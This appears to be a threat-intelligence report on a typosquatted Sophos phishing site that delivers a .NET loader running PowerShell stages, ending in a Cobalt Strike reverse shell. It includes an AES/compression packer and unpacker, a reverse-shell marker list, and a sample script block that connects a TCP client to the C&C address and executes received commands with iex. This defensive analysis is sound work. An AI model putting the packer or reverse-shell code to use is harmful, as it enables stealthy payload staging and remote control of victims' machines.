- Cyble Research & Intelligence Labs (CRIL) encountered a typosquatted Sophos domain.
- The phishing site carries the malware payload embedded in its page source.
- When a user visits the site, the payload is downloaded to the victim's machine automatically, without any user interaction; the user still has to run the downloaded file.
- The phishing website distributes a malicious .NET loader containing an embedded PowerShell script.
- The loader executes this PowerShell script in an in-process runspace, so no new powershell.exe process is created and subsequent PowerShell stages can be executed dynamically.
- The script delivers a Cobalt Strike beacon that establishes a reverse TCP shell to an IP address and port encoded as hexadecimal literals.
Cyble Research & Intelligence Labs (CRIL) came across a typosquatted domain of Sophos, “sopbos[.]com”, during a VirusTotal search. The phishing site impersonates the Sophos Home installation page.
The initial infection vector is unclear at this time, as we could not trace how users are directed to this phishing site. Based on the site's content, we suspect users reach it through phishing emails or advertisements carrying a link that asks them to install Sophos Home. Once the page loads, it starts the payload download automatically, without requiring any user interaction; the user still has to execute the downloaded file.
The figure below shows the malicious site impersonating Sophos.
The downloaded file is a malicious .NET loader that contains an embedded PowerShell script. Notably, the loader executes this script inside a runspace, so no new PowerShell process is created and subsequent scripts can be executed on the fly. Ultimately, a Cobalt Strike beacon is deployed that establishes a reverse TCP shell.
The figure below shows the code of the phishing site.
The figure below shows the code for downloading the file.
The downloaded file is a 64-bit .NET binary that, upon execution, uses a runspace to execute the embedded PowerShell code. The malware creates the runspace with the RunspaceFactory.CreateRunspace() method, as shown in Figure 4. This approach executes the PowerShell script without saving it to disk or starting a new process: the PowerShell engine (System.Management.Automation) is loaded into the loader's own process, so no powershell.exe is spawned and detections keyed on PowerShell process creation or command lines do not fire. Note that script block logging (Event ID 4104) is implemented inside the engine itself, so a hosted runspace still generates those events when the policy is enabled, though with the loader's process ID rather than that of powershell.exe.
This executable can also run with specific command line parameters. It checks whether any of the optional arguments below have been supplied and adjusts its behavior accordingly. Of these, -extract is the most useful to an analyst, since it writes the decoded PowerShell script to a file.
| Command Line Argument | Description | Case Sensitive |
|---|---|---|
| -wait | Prints “Hit any key to exit…” | Yes |
| -extract | Writes the decoded PowerShell to a file | No |
| -end | Stores the position at which this argument is passed | Yes |
| -debug | Launches the debugger using System.Diagnostics.Debugger.Launch() | Yes |
Following this, the executable decodes the Base64-encoded PowerShell script embedded within it, adds it to the PowerShell runspace session with the AddScript() method, and starts its execution asynchronously with the BeginInvoke() method.
The figure below illustrates the encoded PowerShell script.
The PowerShell script then runs: it decodes a further Base64-encoded string, AES-decrypts the decoded data, decompresses the result, and converts it to a UTF-8 string. Finally, it executes the PowerShell script obtained this way using the Invoke-Expression cmdlet. This script, shown in Figure 6, is essentially a wrapper that hides and executes the next-stage PowerShell code.
Both scripts follow the same decrypt, decompress and execute pattern, but they use different decryption keys, initialization vectors (IVs), and compression algorithms: the first script decompresses with a DeflateStream, the second with a GZipStream.
The figure below shows the comparison between scripts.
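The unpacking chain described above (Base64, then AES with a key and IV, then Deflate or GZip decompression, then UTF-8), re-created as an added example so it can be run against a blob lifted from a script. This is not Cyble's code and not the loader's own script; AES-CBC with PKCS7 padding is assumed (the page states only that AES with a key and IV is used), and the key, IV, next-stage text and function names are constructed for the demo. The decoded stage is returned as text instead of being passed to Invoke-Expression, which is the one change an analyst makes when extracting the next stage.

```powershell
# Added example (not Cyble's code, not the malware's script): Base64 -> AES-CBC ->
# Deflate/GZip -> UTF-8, with a matching packer so the demo runs offline.
# Key, IV and next-stage text are constructed; CBC/PKCS7 is an assumption.

function Unprotect-StagePayload {
    param(
        [Parameter(Mandatory)] [string] $Base64Blob,
        [Parameter(Mandatory)] [byte[]] $Key,      # 16, 24 or 32 bytes
        [Parameter(Mandatory)] [byte[]] $IV,       # 16 bytes
        [ValidateSet('Deflate', 'GZip')] [string] $Compression = 'Deflate'
    )
    $cipherBytes = [Convert]::FromBase64String($Base64Blob)

    # Aes.Create() defaults to CBC mode with PKCS7 padding (assumed to match the sample).
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = $IV
    $decryptor  = $aes.CreateDecryptor()
    $compressed = $decryptor.TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)

    # The two stages differ only in the wrapper stream: raw Deflate vs. GZip.
    $inStream = [System.IO.MemoryStream]::new($compressed)
    $decompressor = if ($Compression -eq 'Deflate') {
        [System.IO.Compression.DeflateStream]::new($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    } else {
        [System.IO.Compression.GZipStream]::new($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    }
    $outStream = [System.IO.MemoryStream]::new()
    $decompressor.CopyTo($outStream)
    $decompressor.Dispose()
    $aes.Dispose()

    # Return the next stage as text; the malware hands this string to Invoke-Expression.
    return [System.Text.Encoding]::UTF8.GetString($outStream.ToArray())
}

function Protect-StagePayload {
    # Inverse of the above, used only to build a sample blob for the demo.
    param(
        [Parameter(Mandatory)] [string] $Script,
        [Parameter(Mandatory)] [byte[]] $Key,
        [Parameter(Mandatory)] [byte[]] $IV,
        [ValidateSet('Deflate', 'GZip')] [string] $Compression = 'Deflate'
    )
    $plain     = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $outStream = [System.IO.MemoryStream]::new()
    $compressor = if ($Compression -eq 'Deflate') {
        [System.IO.Compression.DeflateStream]::new($outStream, [System.IO.Compression.CompressionMode]::Compress, $true)
    } else {
        [System.IO.Compression.GZipStream]::new($outStream, [System.IO.Compression.CompressionMode]::Compress, $true)
    }
    $compressor.Write($plain, 0, $plain.Length)
    $compressor.Dispose()                          # flushes the stream footer; leaveOpen keeps $outStream usable
    $compressed = $outStream.ToArray()

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = $IV
    $encryptor = $aes.CreateEncryptor()
    $cipherBytes = $encryptor.TransformFinalBlock($compressed, 0, $compressed.Length)
    $aes.Dispose()
    return [Convert]::ToBase64String($cipherBytes)
}

# Constructed demo values; the real samples' keys and IVs are not given on the page.
$demoKey   = [System.Text.Encoding]::ASCII.GetBytes('0123456789abcdef0123456789abcdef')   # 32-byte key
$demoIV    = [System.Text.Encoding]::ASCII.GetBytes('fedcba9876543210')                   # 16-byte IV
$nextStage = 'Write-Output "this is where the next stage would run"'

foreach ($mode in 'Deflate', 'GZip') {
    $blob = Protect-StagePayload -Script $nextStage -Key $demoKey -IV $demoIV -Compression $mode
    "[$mode] " + (Unprotect-StagePayload -Base64Blob $blob -Key $demoKey -IV $demoIV -Compression $mode)
}
```

To apply it to a real sample, copy the Base64 string, key and IV out of the extracted script (the -extract argument of the loader produces the first stage on disk) and call Unprotect-StagePayload with Deflate for the first wrapper and GZip for the second; the output is the following stage in clear text.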
The second PowerShell script decrypts and executes the final PowerShell script, which is the Cobalt Strike beacon. It sets up a reverse shell through which a remote attacker can send commands to the machine, have them executed, and receive the output from the compromised host.
The final PowerShell script begins with the command "Start-Process $PSHOME\powershell.exe" to launch a PowerShell instance, so that the remainder runs inside a regular powershell.exe process rather than within the loader's runspace, as illustrated in the figure below.
The final PowerShell script then connects to a remote server whose IP address and port are given as hexadecimal literals:
- 0x6247e8df: 98[.]71[.]232[.]223
- 0x1f90: 8080
The script opens a network stream and reads incoming data in chunks. It converts the received bytes to text, executes the text with iex (Invoke-Expression), captures the output, appends a custom string, and sends the result back to the remote server. This loop continues until no more data is received, after which the connection is closed.
As the C&C server is down, we were not able to investigate further on this.
The figure below shows the Cobalt Strike beacon.
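A triage helper for the two detection points raised above, added here as an example that is not Cyble's code. Script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) is emitted by the PowerShell engine, so a script run in a runspace hosted by a .NET loader is still logged, only with the loader's process ID; the helper therefore flags script blocks whose host process is not a standard PowerShell host, looks for reverse-shell markers of the kind described above, and renders hex-encoded IPv4 and port literals such as 0x6247e8df and 0x1f90. The marker list, the function names, the "loader" process name and the sample script block are constructed for this example; the log name, event ID and the position of ScriptBlockText in the 4104 record are real.

```powershell
# Added example (not Cyble's code): hunt for PowerShell script blocks that were run
# from a non-standard host or that carry reverse-shell markers, and decode hex IP/port
# literals. Marker list and sample are constructed for the demo.

$KnownHosts = @('powershell', 'pwsh', 'powershell_ise', 'unknown')

$ReverseShellMarkers = @(
    'System\.Net\.Sockets\.TCPClient',
    'GetStream\(\)',
    '\biex\b|Invoke-Expression',
    'Start-Process\s+\$PSHOME\\powershell\.exe'
)

function ConvertFrom-HexIPv4 {
    # 0x6247e8df -> 98.71.232.223 (the literal is the address in big-endian a.b.c.d order)
    param([Parameter(Mandatory)] [string] $Hex)
    $value = [Convert]::ToUInt32(($Hex -replace '^0x', ''), 16)
    $bytes = [BitConverter]::GetBytes($value)             # host byte order
    if ([BitConverter]::IsLittleEndian) { [Array]::Reverse($bytes) }
    return ($bytes -join '.')
}

function Test-ScriptBlockSuspicious {
    param(
        [Parameter(Mandatory)] [string] $ScriptText,
        [string] $HostProcessName = 'unknown'
    )
    $hits      = @(foreach ($pattern in $ReverseShellMarkers) { if ($ScriptText -match $pattern) { $pattern } })
    $addresses = @([regex]::Matches($ScriptText, '0x[0-9a-fA-F]{8}\b') | ForEach-Object { ConvertFrom-HexIPv4 $_.Value })
    $ports     = @([regex]::Matches($ScriptText, '0x[0-9a-fA-F]{4}\b') | ForEach-Object { [Convert]::ToUInt16(($_.Value -replace '^0x', ''), 16) })
    $unusualHost = $HostProcessName -notin $KnownHosts

    [pscustomobject]@{
        HostProcess      = $HostProcessName
        UnusualHost      = $unusualHost                    # engine loaded by something other than a PowerShell host
        MarkerHits       = $hits
        DecodedAddresses = $addresses
        DecodedPorts     = $ports
        Suspicious       = $unusualHost -or ($hits.Count -ge 2)
    }
}

function Get-SuspiciousScriptBlock {
    # Live hunt over the local log; requires script block logging to be enabled.
    param([int] $MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        $text     = $_.Properties[2].Value                 # ScriptBlockText
        $hostName = 'unknown'                              # the logging process may already have exited
        if ($_.ProcessId) {
            $proc = Get-Process -Id $_.ProcessId -ErrorAction SilentlyContinue
            if ($proc) { $hostName = $proc.ProcessName }
        }
        $result = Test-ScriptBlockSuspicious -ScriptText $text -HostProcessName $hostName
        if ($result.Suspicious) {
            $result | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru
        }
    }
}

# Constructed sample in the shape of the final stage described above (not the real script),
# as if it had been logged from a hypothetical host process named "loader".
$sample = @'
Start-Process $PSHOME\powershell.exe
$client = New-Object System.Net.Sockets.TCPClient(0x6247e8df, 0x1f90)
$stream = $client.GetStream()
$output = iex $command 2>&1 | Out-String
'@
Test-ScriptBlockSuspicious -ScriptText $sample -HostProcessName 'loader'
```

On a live host, Get-SuspiciousScriptBlock resolves the event's process ID only while that process is still running; for historical events, correlate the ProcessId on the 4104 record with Sysmon process-creation events instead. The marker threshold is deliberately low (two hits), so tune it against your own baseline before alerting on it.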
In the past, Cobalt Strike has been employed by Threat Actors (TAs) to distribute various malware payloads, including ransomware and Remote Access Trojans (RATs). Unfortunately, because the C&C (Command and Control) server was inaccessible, we were unable to examine the specific payload the TAs intended to deploy. It is worth noting, however, that this campaign used a .NET loader to execute PowerShell scripts through a runspace. Though this is not a new technique, it improves the malware's evasiveness by executing scripts without spawning a powershell.exe process or saving them to disk, thereby reducing the chance of detection by controls that watch for either.
- Deploy Cobalt Strike-specific signatures and rules in your network monitoring solution.
- Implement application whitelisting to restrict PowerShell script execution to approved and trusted scripts or locations, and enable PowerShell script block logging, which also records scripts executed from a hosted runspace.
- Block the malicious IOCs shared in the table below.
MITRE ATT&CK® Techniques
| Tactic | Technique | Description |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | This malware reaches users via phishing sites. |
| Execution (TA0002) | User Execution (T1204) | The user needs to manually execute the malicious file downloaded from the phishing site. |
| Execution (TA0002) | Command and Scripting Interpreter (T1059) | PowerShell scripts are used to execute the Cobalt Strike beacon. |
| Defense Evasion (TA0005) | Indirect Command Execution (T1202) | PowerShell commands are executed using a malicious executable. |
| Defense Evasion (TA0005) | Masquerading (T1036) | The downloaded file is disguised as a Sophos installer. |
| Defense Evasion (TA0005) | Deobfuscate/Decode Files or Information (T1140) | PowerShell scripts are deobfuscated and decoded to get the Cobalt Strike beacon. |
| Command and Control (TA0011) | Non-Application Layer Protocol (T1095) | TCP is used by the Cobalt Strike beacon to interact with the C&C server. |
Indicators of Compromise (IOCs)
| Indicator | Indicator Type |
|---|---|
| c974ffe23d57ec909ef26b55f202047e | MD5 |
| ec6da5616d6b3b3269fababe104bfe04f2828717 | SHA1 |
| 067c95ad074afd8993281b02f74d0f257fb312943da0887355da652afb54c0ab | SHA256 |
| sopbos[.]com | Domain (phishing site) |
| 98[.]71[.]232[.]223:8080 | IP:port (C&C) |